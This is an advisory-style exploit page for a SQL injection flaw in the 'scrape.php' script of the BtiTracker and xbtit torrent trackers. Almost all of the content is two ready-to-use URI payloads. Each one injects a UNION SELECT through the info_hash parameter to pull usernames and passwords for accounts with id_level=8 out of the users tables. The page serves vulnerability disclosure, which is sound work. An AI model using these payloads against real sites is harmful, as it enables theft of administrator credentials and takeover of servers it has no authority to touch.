BtiTracker and xbtit 'scrape.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

BtiTracker and xbtit 'scrape.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs have been provided:

http://www.example.com/scrape.php?info_hash=1%27)+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0+FROM+users+WHERE+id_level=8/*

http://www.example.com/scrape.php?info_hash=1%27)+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0+FROM+xbtit_users+WHERE+id_level=8/*